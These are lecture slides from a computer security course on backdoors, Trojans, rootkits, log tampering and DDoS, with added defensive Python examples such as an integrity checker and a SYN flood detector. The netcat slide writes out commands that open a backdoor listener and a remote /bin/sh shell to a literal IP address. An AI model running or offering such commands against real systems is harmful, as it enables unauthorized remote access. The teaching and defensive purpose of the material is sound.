
Summary From the Last Lecture

• Intrusions (vulnerability, exploit)
• Intrusion phases
• Reconnaissance (non-technical, technical)
  – Interrogating DNS, split-horizon DNS
• Scanning
  – Learn about live machines, open ports, firewall rules, network topology, OSes, vulnerabilities
  – NATs
  – Firewalls
• Gaining access
  – Buffer overflow attacks
  – Sniffing
  – ARP poisoning, DNS poisoning
  – Spoofing TCP sessions

Announcements

• Midterm in two weeks
• Midterm review next week
  – We will go over two sample midterms, posted on class Web page
  – Bring any questions you may have
• Reading list posted on the class Web page

Firewall Types

• Packet (stateless) firewall
  – Rules speak about IP/TCP header fields
  – No connection state kept
  – E.g. drop all traffic with TCP SYN and src IP from the outside
• Stateful firewall
  – Connection state is kept
  – E.g. drop all traffic except TCP ACK on established TCP connections
• Proxy firewall
  – Acts as a middleman to every connection, i.e. acts as the destination and the source for every connection
  – Can normalize protocols, reset TTL fields, etc.
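Added example (not part of the lecture slides): a toy packet filter that contrasts the stateless rule "drop TCP SYN from the outside" with a stateful rule "admit inbound packets only on connections opened from the inside". The network prefix, addresses and packets are constructed; the stateless rule drops a packet with SYN set and ACK clear, since SYN+ACK replies to inside-initiated connections must be allowed through.

```python
# Added example (not from the lecture): stateless vs stateful packet filtering.
# All addresses and packets are constructed.
from dataclasses import dataclass

INSIDE_PREFIX = "10.0.0."  # constructed: the protected network


@dataclass(frozen=True)
class Packet:
    src: str
    dst: str
    sport: int
    dport: int
    flags: frozenset  # subset of {"SYN", "ACK", "FIN"}


def is_inside(ip):
    return ip.startswith(INSIDE_PREFIX)


def stateless_allow(pkt):
    """Packet (stateless) firewall: looks only at the header fields of this packet.
    Rule: drop a TCP SYN (with ACK clear) whose source is outside; pass the rest."""
    if not is_inside(pkt.src) and "SYN" in pkt.flags and "ACK" not in pkt.flags:
        return False
    return True


class StatefulFirewall:
    """Stateful firewall: remembers connections opened from the inside and
    admits inbound packets only if they belong to one of them."""

    def __init__(self):
        self.established = set()  # (inside ip, inside port, outside ip, outside port)

    def allow(self, pkt):
        if is_inside(pkt.src):
            if "SYN" in pkt.flags:
                self.established.add((pkt.src, pkt.sport, pkt.dst, pkt.dport))
            return True
        key = (pkt.dst, pkt.dport, pkt.src, pkt.sport)
        if key in self.established:
            if "FIN" in pkt.flags:
                self.established.discard(key)
            return True
        return False  # inbound packet matching no known connection


def run_demo():
    """Returns {label: (stateless decision, stateful decision)} for four packets."""
    fw = StatefulFirewall()
    packets = {
        "outbound SYN": Packet("10.0.0.5", "203.0.113.7", 40000, 80, frozenset({"SYN"})),
        "reply SYN+ACK": Packet("203.0.113.7", "10.0.0.5", 80, 40000, frozenset({"SYN", "ACK"})),
        "unsolicited SYN": Packet("198.51.100.9", "10.0.0.5", 1234, 22, frozenset({"SYN"})),
        "unsolicited ACK": Packet("198.51.100.9", "10.0.0.5", 1234, 22, frozenset({"ACK"})),
    }
    return {label: (stateless_allow(p), fw.allow(p)) for label, p in packets.items()}
```

The last packet is the point of the comparison: an ACK arriving from outside that belongs to no connection passes the stateless rule (it is not a SYN) but is dropped by the stateful firewall because no inside host ever opened that connection.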

Phase 4: Maintaining Access

• Attacker establishes a listening application on a port (backdoor) so he can log on any time with or without a password
• Attackers frequently close security holes they find to stop others from taking over their compromised machines

Netcat Tool

• Similar to Linux cat command
  – http://netcat.sourceforge.net/
  – Client: Initiates connection to any port on remote machine
  – Server: Listens on any port
  – To open a shell on a victim machine

On victim machine: nc -l -p 1234                      /* This opens a backdoor */
On attacker machine: nc 123.32.34.54 1234 -c /bin/sh   /* This enters through a backdoor, opens a shell */

Dangerous

Netcat Tool

• Used for
  – Port scanning
  – Backdoor
  – Relaying the attack (stepping stones)

Trojans

• Application that claims to do one thing (and looks like it) but it also does something malicious
• Users download Trojans from Internet (thinking they are downloading a free game) or get them as greeting cards in E-mail, or as ActiveX controls when they visit a Web site
• Trojans can scramble your machine
  – They can also open a backdoor on your system, steal data, misuse your machine, etc.
• They will report successful infection to the attacker

Back Orifice

• Trojan application that can
  – Log keystrokes
  – Steal passwords
  – Create dialog boxes
  – Mess with files, processes or system (registry)
  – Redirect packets
  – Set up backdoors
  – Take over screen and keyboard
  – http://www.bo2k.com/

Dangerous

Trojan Defenses

• Antivirus software
• Don’t download suspicious software
• Check MD5 sum on trusted software you download
• Disable automatic execution of attachments

At the End of Maintaining Access

• The attacker has opened a backdoor and can now access victim machine at any time

Phase 5: Covering Tracks

• Rootkits
• Alter logs
• Create hard-to-spot files
• Use covert channels

Application Rootkits

• Alter or replace system components (for instance DLLs)
• E.g., on Linux attacker replaces ls program
• Rootkits frequently come together with sniffers:
  – Capture a few characters of all sessions on the Ethernet and write into a file to steal passwords
  – Administrator would notice an interface in promiscuous mode
    • Not if attacker modifies the application that shows interfaces, e.g. netstat

Application Rootkits

• Attacker will modify all key system applications that could reveal his presence
  – List processes, e.g. ps
  – List files, e.g. ls
  – Show open ports, e.g. netstat
  – Show system utilization, e.g. top
• He will also substitute the modification date with one in the past

Defenses Against App. Rootkits

• Don’t let attackers gain root access
• Use integrity checking of files:
  – Carry a CD with md5sum, check hashes of system files against hashes advertised on vendor site or hashes you stored before
• Use Tripwire
  – Free integrity checker that saves md5 sums of all important files in a secure database (read-only CD), then verifies them periodically
  – http://www.tripwire.org/
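Added example (not part of the lecture slides, and not Tripwire's own code): a small integrity checker in the spirit of the two defenses above, serving both the "check the hash of software you download" point from the Trojan Defenses slide and the Tripwire-style baseline here. It hashes every file under a directory, stores the result as a baseline (which in practice would go on read-only media), and later reports modified, missing and added files. The files, directory layout and "vendor" hash are constructed in a temporary directory. The slides mention md5sum; SHA-256 is used by default here because MD5 collisions are practical, but the algorithm name is a parameter.

```python
# Added example (not from the lecture): Tripwire-style baseline and verify,
# plus a download hash check. All files below are constructed in a temp dir.
import hashlib
import hmac
import json
import os
import tempfile


def file_digest(path, algo="sha256"):
    """Hash a file in chunks; `algo` is any hashlib name (md5, sha256, ...)."""
    h = hashlib.new(algo)
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_download(path, expected_hex, algo="sha256"):
    """Trojan defense: compare a downloaded file against the hash the vendor
    publishes. compare_digest avoids leaking where the strings differ."""
    return hmac.compare_digest(file_digest(path, algo), expected_hex.lower())


def build_baseline(root, algo="sha256"):
    """Record a hash for every file under root, keyed by relative path."""
    baseline = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            baseline[os.path.relpath(full, root)] = file_digest(full, algo)
    return baseline


def verify_baseline(root, baseline, algo="sha256"):
    """Compare the live tree with a stored baseline; returns what changed."""
    current = build_baseline(root, algo)
    return {
        "modified": sorted(k for k in baseline if k in current and current[k] != baseline[k]),
        "missing": sorted(k for k in baseline if k not in current),
        "added": sorted(k for k in current if k not in baseline),
    }


def demo():
    """Constructed scenario: baseline three 'system binaries', then simulate an
    application rootkit replacing ls and leaving a sniffer output file behind."""
    with tempfile.TemporaryDirectory() as root:
        bin_dir = os.path.join(root, "bin")
        os.makedirs(bin_dir)
        for name in ("ls", "ps", "netstat"):
            with open(os.path.join(bin_dir, name), "wb") as f:
                f.write(b"#!/bin/sh\necho genuine " + name.encode() + b"\n")
        # The baseline would normally be written to a read-only CD; a JSON
        # string stands in for that medium here.
        stored = json.dumps(build_baseline(root))

        with open(os.path.join(bin_dir, "ls"), "wb") as f:
            f.write(b"#!/bin/sh\necho trojaned ls\n")
        with open(os.path.join(root, ".sniff.log"), "wb") as f:
            f.write(b"captured session bytes")

        return verify_baseline(root, json.loads(stored))


def demo_download():
    """Constructed: a 'downloaded' file checked against the hash the vendor
    would publish, then against a hash that is off by one hex digit."""
    content = b"free game installer (constructed bytes)\n"
    good = hashlib.sha256(content).hexdigest()
    bad = good[:-1] + ("0" if good[-1] != "0" else "1")
    with tempfile.NamedTemporaryFile(delete=False) as f:
        f.write(content)
        path = f.name
    try:
        return verify_download(path, good), verify_download(path, bad)
    finally:
        os.remove(path)
```

As the Kernel Rootkits slide notes, this only catches changes to files on disk; a kernel rootkit that lies to the open() and read() calls the checker itself makes defeats it, which is why the baseline and the checker binary belong on media the compromised host cannot alter.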

Kernel Rootkits

• Replace system calls
  – Intercept calls to open one application with calls to open another, of attacker’s choosing
  – Now even checksums don’t help as attacker did not modify any system applications
  – You won’t even see attacker’s files in file listing
  – You won’t see some processes or open ports
• Usually installed as kernel modules
• Defenses: disable kernel modules

Altering Logs

• Attackers can:
  – Stop logging services
  – Load files into memory, change them
  – Restart logging service
  – Or simply change log file through scripts
• Change login and event logs, command history file, last login data

Defenses Against Altering Logs

• Use separate log servers
  – Machines will send their log messages to these servers
• Encrypt log files
• Make log files append only
• Save logs on write-once media
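Added example (not part of the lecture slides): one way to make log alteration detectable that goes a step beyond the list above. Each log entry carries a hash over the previous hash and its own text, so editing or deleting an entry breaks the chain; and because an attacker with root can simply recompute the whole chain, the latest hash is also copied to the separate log server the slide describes, so the rewritten chain no longer ends at the value the server holds. The log lines, the "remote copy" variable and the intruder scenario are all constructed.

```python
# Added example (not from the lecture): a hash-chained log plus an off-box
# copy of the chain head. Sample log lines are constructed, not real output.
import hashlib

GENESIS = "0" * 64  # chain anchor for an empty log


def _link(prev_hash, message):
    return hashlib.sha256((prev_hash + "\n" + message).encode()).hexdigest()


def chain_append(log, message):
    """Append one entry; its hash covers the previous hash and this message."""
    prev = log[-1]["hash"] if log else GENESIS
    entry = {"msg": message, "hash": _link(prev, message)}
    log.append(entry)
    return entry["hash"]


def chain_verify(log):
    """Return the index of the first entry whose hash does not fit, or -1."""
    prev = GENESIS
    for i, entry in enumerate(log):
        if entry["hash"] != _link(prev, entry["msg"]):
            return i
        prev = entry["hash"]
    return -1


def matches_remote_anchor(log, remote_hash):
    """The separate log server keeps the latest hash; a chain rewritten on the
    compromised host will not end at that value."""
    local = log[-1]["hash"] if log else GENESIS
    return local == remote_hash


def demo():
    lines = [  # constructed sample log lines
        "sshd: Accepted password for alice from 10.0.0.8",
        "sshd: Accepted password for root from 198.51.100.9",  # the intruder
        "sudo: alice : COMMAND=/bin/ls",
        "sshd: session closed for user root",
    ]
    log = []
    for line in lines:
        remote = chain_append(log, line)  # stands in for the log server's copy

    intact = chain_verify(log)  # -1: nothing wrong yet

    # 1. Attacker edits the entry recording the intruder login in place.
    log[1]["msg"] = "sshd: Failed password for root from 198.51.100.9"
    edited = chain_verify(log)  # 1: first entry that no longer fits

    # 2. Attacker recomputes every hash after the edit: the chain verifies...
    prev = GENESIS
    for entry in log:
        entry["hash"] = _link(prev, entry["msg"])
        prev = entry["hash"]
    rehashed = chain_verify(log)  # -1
    # ...but the head no longer matches the copy held by the log server.
    anchored = matches_remote_anchor(log, remote)  # False
    return intact, edited, rehashed, anchored
```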

Creating Hard-to-Spot Files

• Names could look like system file names, but slightly changed
  – Start with .
  – Start with . and add spaces
  – Make files hidden
• Defenses: intrusion detection systems and caution
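Added example (not part of the lecture slides): a scanner of the kind an intrusion detection tool might run over a directory listing, flagging exactly the naming tricks listed above: names padded with spaces, names made of dots only, hidden files in system directories, and names one edit away from a well-known program. The listing, the set of system directories and the list of known program names are constructed assumptions.

```python
# Added example (not from the lecture): flag file names of the kinds described
# on the slide. The directory listing is constructed, not read from disk.

SYSTEM_DIRS = ("/bin", "/sbin", "/usr/bin", "/usr/sbin", "/etc")
# Constructed short list of program names an imposter file tends to imitate.
KNOWN_NAMES = {"ls", "ps", "netstat", "top", "sshd", "login", "init", "cron"}


def edit_distance(a, b):
    """Levenshtein distance; catches near-miss names such as 'netsat'."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def suspicious_reasons(directory, name):
    """Return a list of reasons this name looks like a hidden or imposter file."""
    reasons = []
    stripped = name.strip()
    if name != stripped:
        reasons.append("leading/trailing whitespace")
    if stripped and set(stripped) <= {"."} and stripped not in (".", ".."):
        reasons.append("dots-only name")
    if stripped.startswith(".") and stripped not in (".", "..") and directory in SYSTEM_DIRS:
        reasons.append("hidden file in system directory")
    if stripped not in KNOWN_NAMES:
        candidate = stripped.lstrip(".")
        for known in sorted(KNOWN_NAMES):
            if edit_distance(candidate, known) <= 1:
                reasons.append(f"looks like {known}")
                break
    return reasons


def scan(listing):
    """listing: iterable of (directory, name). Returns [(path, [reasons])]."""
    out = []
    for directory, name in listing:
        reasons = suspicious_reasons(directory, name)
        if reasons:
            out.append((directory + "/" + name, reasons))
    return out


def demo():
    listing = [  # constructed directory entries
        ("/bin", "ls"),
        ("/home/alice", ".bashrc"),
        ("/tmp", "..."),
        ("/usr/bin", ". "),
        ("/usr/bin", "netsat"),
        ("/usr/bin", ".sshd"),
        ("/bin", "ps "),
    ]
    return scan(listing)
```

A genuine `/bin/ls` and a user's own `.bashrc` produce no reasons; everything else in the constructed listing is reported with the rule that caught it, which is the kind of output an operator can act on without chasing false alarms over every dotfile in a home directory.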

Denial of Service

Distributed Denial Of Service?

Denial of Service Attacks

• Unlike other forms of computer attacks, goal isn’t access or theft of information or services
• The goal is to stop the service from operating
  – To deny service to legitimate users
  – Slowing down may be good enough
• This is usually a temporary effect that passes as soon as the attack stops

How Can a Service Be Denied?

• Lots of ways
  – Crash the machine
  – Or put it into an infinite loop
  – Crash routers on the path to the machine
  – Use up a key machine resource
  – Use up a key network resource
  – Deny another service needed for this one (DNS)
• Using up resources is the most common approach

High-level Attack Categorization

• Floods
• Congestion control exploits
• Unexpected header values
• Invalid content
• Invalid fragments
• Large packets
• Impersonation attacks

Simple Denial of Service

• One machine tries to bring down another machine
• There is a fundamental problem for the attacker:
  – The attack machine must be “more powerful” than the target machine to overload it OR
  – Attacker uses approaches other than flooding
• The target machine might be a powerful server

Denial of Service and Asymmetry

• Sometimes generating a request is cheaper than formulating a response, e.g. sending a bogus packet is cheaper than decrypting this packet and checking that it’s bogus
• If so, one attack machine can generate a lot of requests, and effectively multiply its power
• Not always possible to achieve this asymmetry
• This is called the amplification effect

DDoS “Solves” That Problem

• Use multiple machines to generate the workload

• For any server of fixed power, enough attack machines working together can overload it

• Enlist lots of machines and coordinate their attack on a single machine

Distributed Computing

Typical Attack Modus Operandi

Is DDoS a Real Problem?

• Yes, attacks happen every day
  – One study reported ~4,000 per week [1]
• On a wide variety of targets
• Tend to be highly successful
• There are very few mechanisms that can stop certain attacks
• There have been successful attacks on major commercial sites

[1] “Inferring Internet Denial of Service Activity,” Moore, Voelker, and Savage, Usenix Security Symposium, 2002

DDoS on Twitter

• August 2009, hours-long service outage
  – 44 million users affected
• At the same time Facebook, LiveJournal, YouTube and Blogger were under attack
  – Only some users experienced an outage
• Real target: a Georgian blogger

[Image borrowed from Wired.com article, originally provided by Arbor Networks]

DDoS on Mastercard and Visa

• December 2010
• Parts of services went down briefly
• Attack launched by a group of vigilantes called Anonymous
  – Bots recruited through social engineering
  – Directed to download DDoS software and take instructions from a master
  – Motivation: Payback to services that cut their support of WikiLeaks after their founder was arrested on unrelated charges
• Several other services affected

Potential Effects of DDoS Attacks

• Most (if not all) sites could be rendered non-operational
• The Internet could be largely flooded with garbage traffic
• Essentially, the Internet could grind to a halt
  – In the face of a very large attack
• Almost any site could be put out of business
  – With a moderate sized attack

Who Is Vulnerable?

• Everyone connected to the Internet can be attacked

• Everyone who uses Internet for crucial operations can suffer damages

But My Machines Are Well Secured!

Doesn’t matter! The problem isn’t your vulnerability, it’s everyone else’s

But I Have a Firewall!

Doesn’t matter! Either the attacker slips his traffic into legitimate traffic, or he attacks the firewall

But I Use a VPN!

Doesn’t matter!

The attacker can fill your tunnel with garbage. Sure, you’ll detect it and discard it . . .
But you’ll be so busy doing so that you’ll have no time for your real work

But I’m Heavily Provisioned

Doesn’t matter!

The attacker can probably get enough resources to overcome any level of resources you buy

Attack Toolkits

• Widely available on the net
  – Easily downloaded along with source code
  – Easily deployed and used
• Automated code for:
  – Scanning – detection of vulnerable machines
  – Exploit – breaking into the machine
  – Infection – placing the attack code
• Rootkits
  – Hide the attack code
  – Restart the attack code
  – Keep open backdoors for attacker access
• DDoS attack code

DDoS Attack Code

• Attacker can customize:
  – Type of attack
    • UDP flood, ICMP flood, TCP SYN flood, Smurf attack (broadcast ping flood)
    • Web server request flood, authentication request flood, DNS flood
  – Victim IP address
  – Duration
  – Packet size
  – Source IP spoofing
  – Dynamics (constant rate or pulsing)
  – Communication between master and slaves
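Added example (not part of the lecture slides): detection logic for one of the attack types listed above, a TCP SYN flood with spoofed sources and pulsing dynamics, run over constructed connection records. A SYN whose three-way handshake never completes (no ACK from that source) leaves a half-open connection; the detector counts, per destination port, how many such SYNs fall into any one-second window and reports ports over a threshold. The event format, the threshold, the window and every address are constructed assumptions.

```python
# Added example (not from the lecture): SYN flood detection over constructed
# connection records. Sources, threshold and window are all assumptions.
from collections import defaultdict

HALF_OPEN_LIMIT = 5  # constructed: unanswered SYNs per destination port per window
WINDOW = 1.0         # seconds


def half_open_counts(events, window=WINDOW):
    """events: list of (time, src, dst, dport, flags) with flags 'SYN' or 'ACK'.
    Returns {(dst, dport): peak number of unanswered SYNs inside any window}."""
    completed = set()  # (src, dst, dport) for which the client's ACK arrived
    for _, src, dst, dport, flags in events:
        if flags == "ACK":
            completed.add((src, dst, dport))

    syn_times = defaultdict(list)  # (dst, dport) -> times of unanswered SYNs
    for t, src, dst, dport, flags in events:
        if flags == "SYN" and (src, dst, dport) not in completed:
            syn_times[(dst, dport)].append(t)

    peaks = {}
    for key, times in syn_times.items():
        times.sort()
        best, start = 0, 0
        for end in range(len(times)):  # sliding window over sorted times
            while times[end] - times[start] > window:
                start += 1
            best = max(best, end - start + 1)
        peaks[key] = best
    return peaks


def flooded_ports(events, limit=HALF_OPEN_LIMIT, window=WINDOW):
    """Destination (ip, port) pairs whose peak half-open count exceeds the limit."""
    return sorted(k for k, n in half_open_counts(events, window).items() if n > limit)


def demo():
    events = []
    # A legitimate client completing its handshake with the web server.
    events += [(0.0, "10.0.0.8", "203.0.113.5", 80, "SYN"),
               (0.1, "10.0.0.8", "203.0.113.5", 80, "ACK")]
    # Pulsing flood: two bursts of 20 SYNs, each from a different spoofed
    # source, within 0.4 s, separated by silence.
    for burst_start in (1.0, 5.0):
        for i in range(20):
            events.append((burst_start + i * 0.02, f"198.51.100.{i}", "203.0.113.5", 443, "SYN"))
    # A few unanswered SYNs to SSH spread over time (scan noise, under the limit).
    for i in range(4):
        events.append((10.0 + i * 3.0, "192.0.2.7", "203.0.113.5", 22, "SYN"))
    return half_open_counts(events), flooded_ports(events)
```

The completed-handshake set is what separates a flood from a busy server: a legitimate burst of connections also produces many SYNs, but each is followed by the client's ACK, while spoofed sources never answer the SYN+ACK.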

Implications Of Attack Toolkits

• You don’t need much knowledge or great skills to perpetrate DDoS

• Toolkits allow unsophisticated users to become DDoS perpetrators in little time

• DDoS is, unfortunately, a game anyone can play

DDoS Attack Trends

• Attackers follow defense approaches, adjust their code to bypass defenses
• Use of subnet spoofing defeats ingress filtering
• Use of encryption and decoy packets, IRC or P2P obscures master-slave communication
• Encryption of attack packets defeats traffic analysis and signature detection
• Pulsing attacks defeat slow defenses and traceback
• Flash-crowd attacks generate legitimate (well-formed) application traffic
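Added example (not part of the lecture slides): an ingress filter of the kind the "subnet spoofing defeats ingress filtering" bullet refers to, together with the limit it names. The filter (BCP 38 style) accepts a packet from the customer side only if its source lies in the customer's own prefix, which stops spoofing of arbitrary addresses; packets spoofing a neighbour inside that prefix pass untouched. A source-diversity check is added as a complementary heuristic; it, the prefix, the host-count threshold and all traffic are constructed assumptions, not part of the slide.

```python
# Added example (not from the lecture): ingress filtering and why subnet
# spoofing slips past it. Prefix, threshold and traffic are constructed.
import ipaddress

# Constructed: the prefix allocated to the customer network behind this interface.
CUSTOMER_PREFIX = ipaddress.ip_network("192.0.2.0/24")
# Constructed heuristic threshold (an assumption): more distinct source
# addresses than the customer has hosts is suspicious.
EXPECTED_MAX_HOSTS = 30


def ingress_allow(src_ip, prefix=CUSTOMER_PREFIX):
    """Ingress filtering (BCP 38): accept a packet arriving from the customer
    side only if its source address lies inside the customer's own prefix."""
    return ipaddress.ip_address(src_ip) in prefix


def filter_packets(src_ips, prefix=CUSTOMER_PREFIX):
    """Returns (passed sources, dropped sources), preserving order."""
    passed, dropped = [], []
    for s in src_ips:
        (passed if ingress_allow(s, prefix) else dropped).append(s)
    return passed, dropped


def too_many_sources(passed, limit=EXPECTED_MAX_HOSTS):
    """Complementary check: subnet-spoofed traffic passes the prefix test, but
    it shows far more distinct sources than the customer has hosts."""
    return len(set(passed)) > limit


def demo():
    # Constructed traffic: two genuine hosts, ten packets spoofing addresses
    # outside the prefix, and sixty packets each spoofing a different neighbour
    # address inside the customer's /24 (the subnet spoofing the slide names).
    genuine = ["192.0.2.10", "192.0.2.11"] * 3
    remote_spoof = [f"203.0.113.{i}" for i in range(10)]
    subnet_spoof = [f"192.0.2.{100 + i}" for i in range(60)]
    passed, dropped = filter_packets(genuine + remote_spoof + subnet_spoof)
    return {
        "dropped_by_ingress_filter": len(dropped),        # 10: only the remote spoofs
        "passed_despite_spoofing": len(set(passed)) - 2,  # 60 spoofed neighbours got through
        "diversity_alarm": too_many_sources(passed),      # True
    }
```

The diversity check is only a heuristic: a large customer network legitimately shows many sources, so the threshold has to be set per link, and it says nothing about which of the passed packets are the spoofed ones, which is exactly the gap the slide's bullet is pointing at.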

Implications For the Future

• If we solve simple attacks, DDoS perpetrators will move on to more complex attacks
• Recently seen trends:
  – Larger networks of attack machines
  – Rolling attacks from large number of machines
  – Attacks at higher semantic levels
  – Attacks on different types of network entities
  – Attacks on DDoS defense mechanisms
• Need flexible defenses that evolve with attacks

How Come We Have DDoS?

• Natural consequence of the way the Internet is organized
  – Best effort service means routers don’t do much processing per packet and store no state – they will let anything through
  – End to end paradigm means routers will enforce no security or authentication – they will let anything through
• It works real well when both parties play fair
• It creates opportunity for DDoS when one party cheats

There Are Still No Strong Defenses Against DDoS

• You can make yourself harder to attack
• But you can’t make it impossible
• And, if you haven’t made it hard enough, there’s not much you can do when you are attacked
  – There are no patches to apply
  – There is no switch to turn
  – There might be no filtering rule to apply
  – Grin and bear it